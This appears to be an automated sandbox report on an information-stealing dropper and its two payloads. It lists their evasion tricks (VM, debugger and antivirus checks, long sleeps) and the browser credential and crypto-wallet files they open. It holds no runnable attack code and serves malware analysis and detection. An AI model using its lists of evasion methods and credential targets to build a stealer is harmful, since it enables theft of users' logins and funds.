                    Source: Binary string: _.pdb source: twl97yF91.exe, 00000001.00000002.322917583.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.322488235.0000000002F56000.00000004.00000020.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000003.259177434.0000000002F0D000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\fokizacawova\vamisobel.pdb source: W7ANVukbbj.exe, 00000000.00000003.254929355.00000000049C9000.00000004.00000020.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000000.255172921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, twl97yF91.exe.0.dr

                    Data Obfuscation

                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeUnpacked PE file: 1.2.twl97yF91.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeUnpacked PE file: 1.2.twl97yF91.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCode function: 0_2_0086724D push ecx; ret 0_2_00867260
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_0041C40C push cs; iretd 1_2_0041C4E2
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_00423149 push eax; ret 1_2_00423179
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_0041C50E push cs; iretd 1_2_0041C4E2
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_004231C8 push eax; ret 1_2_00423179
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_0040E21D push ecx; ret 1_2_0040E230
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_0041C6BE push ebx; ret 1_2_0041C6BF
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CCC125 push ebx; ret 1_2_02CCC126
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CCBE73 push cs; iretd 1_2_02CCBF49
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CCBF75 push cs; iretd 1_2_02CCBF49
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_02CBE484 push ecx; ret 1_2_02CBE497
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_03055704 push edx; retf 1_2_0305570A
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 1_2_03055EFC push ebx; ret 1_2_03055EFD
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCode function: 0_2_00862F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00862F1D
                    Source: uPD30tM82.exe.0.drStatic PE information: 0xB087F0D6 [Wed Nov 7 22:10:30 2063 UTC]
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCode function: 0_2_00861AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00861AE8
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe TID: 5432 Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe TID: 1664 Thread sleep count: 1988 > 30
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe TID: 496 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe TID: 972 Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe TID: 4832 Thread sleep count: 4957 > 30
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe TID: 2464 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Code function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_1-29870
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_1-29610
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Window / User API: threadDelayed 1988
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe Window / User API: threadDelayed 4957
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_0-2575
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exe Code function: 0_2_00865467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00865467
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exe Code function: 0_2_00862390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00862390
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe API call chain: ExitProcess graph end node graph_1-29872
                    Source: twl97yF91.exe, 00000001.00000003.320485719.0000000008003000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware
                    Source: twl97yF91.exe, 00000001.00000003.320485719.0000000008003000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMware5A_A43U4Win32_VideoController6F86THT7VideoController120060621000000.000000-0004011.238display.infMSBDAURN_GV_MPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors4WW9WKO7
                    Source: twl97yF91.exe, 00000001.00000002.334419405.0000000007FC2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Code function: 1_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040CE09
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exe Code function: 0_2_00862F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00862F1D
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Code function: 1_2_0040ADB0 GetProcessHeap,HeapFree,1_2_0040ADB0
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Code function: 1_2_02CB092B mov eax, dword ptr fs:[00000030h] 1_2_02CB092B
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Code function: 1_2_02CB0D90 mov eax, dword ptr fs:[00000030h] 1_2_02CB0D90
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Code function: 1_2_03050490 LdrInitializeThunk,1_2_03050490
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Memory allocated: page read and write | page guard
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exe Code function: 0_2_00866F40 SetUnhandledExceptionFilter,0_2_00866F40
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exe Code function: 0_2_00866CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00866CF0
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Code function: 1_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040E61C
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Code function: 1_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00416F6A
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Code function: 1_2_004123F1 SetUnhandledExceptionFilter,1_2_004123F1
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Code function: 1_2_02CBE883 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_02CBE883
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Code function: 1_2_02CBD070 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_02CBD070
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Code function: 1_2_02CC71D1 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_02CC71D1
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Code function: 1_2_02CC2658 SetUnhandledExceptionFilter,1_2_02CC2658
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exe Code function: 0_2_008618A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_008618A3
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe Queries volume information: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Code function: GetLocaleInfoA,1_2_00417A20
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Code function: GetLocaleInfoA,1_2_02CC7C87
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exe Code function: 0_2_00867155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00867155
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exe Code function: 0_2_00862BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_00862BFB
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: twl97yF91.exe, 00000001.00000002.334419405.0000000007FC2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                    Stealing of Sensitive Information

                    Source: Yara match File source: dump.pcap, type: PCAP
                    Source: Yara match File source: 1.2.twl97yF91.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.3.W7ANVukbbj.exe.4a26820.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 1.2.twl97yF91.exe.2f97bc6.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 1.2.twl97yF91.exe.2cb0e67.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 1.2.twl97yF91.exe.2f96cde.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.3.W7ANVukbbj.exe.4a26820.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 1.2.twl97yF91.exe.4b10000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 1.2.twl97yF91.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 1.3.twl97yF91.exe.2d50000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 1.2.twl97yF91.exe.76c0000.6.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 1.2.twl97yF91.exe.4b10000.4.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 1.3.twl97yF91.exe.2ecf3b8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 1.2.twl97yF91.exe.76c0000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 1.2.twl97yF91.exe.4b10ee8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 1.2.twl97yF91.exe.2f97bc6.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 14.0.uPD30tM82.exe.2b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 1.2.twl97yF91.exe.4b10ee8.5.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 1.2.twl97yF91.exe.2f96cde.3.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000001.00000003.256499672.0000000002D50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000E.00000000.337013680.00000000002B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000001.00000002.322917583.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000001.00000002.322488235.0000000002F56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000001.00000002.333480133.00000000076C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000001.00000003.257010194.0000000002ECF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000003.254929355.0000000004A26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: twl97yF91.exe PID: 3776, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: uPD30tM82.exe PID: 5176, type: MEMORYSTR
                    Source: Yara match File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe, type: DROPPED
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe, File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe, File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: ElectrumE#
                    Source: uPD30tM82.exe, 0000000E.00000002.435203327.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: q1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: JaxxE#
                    Source: uPD30tM82.exe, 0000000E.00000002.435203327.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: uPD30tM82.exe, 0000000E.00000002.435203327.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: %appdata%\Ethereum\wallets
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: ExodusE#
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: EthereumE#
                    Source: uPD30tM82.exe, 0000000E.00000002.435203327.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: q5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                    Source: twl97yF91.exe, 00000001.00000002.322917583.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, String found in binary or memory: set_UseMachineKeyStore
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

                    Remote Access Functionality

                    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                    Valid Accounts | 221 Windows Management Instrumentation | Path Interception | 1 Access Token Manipulation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
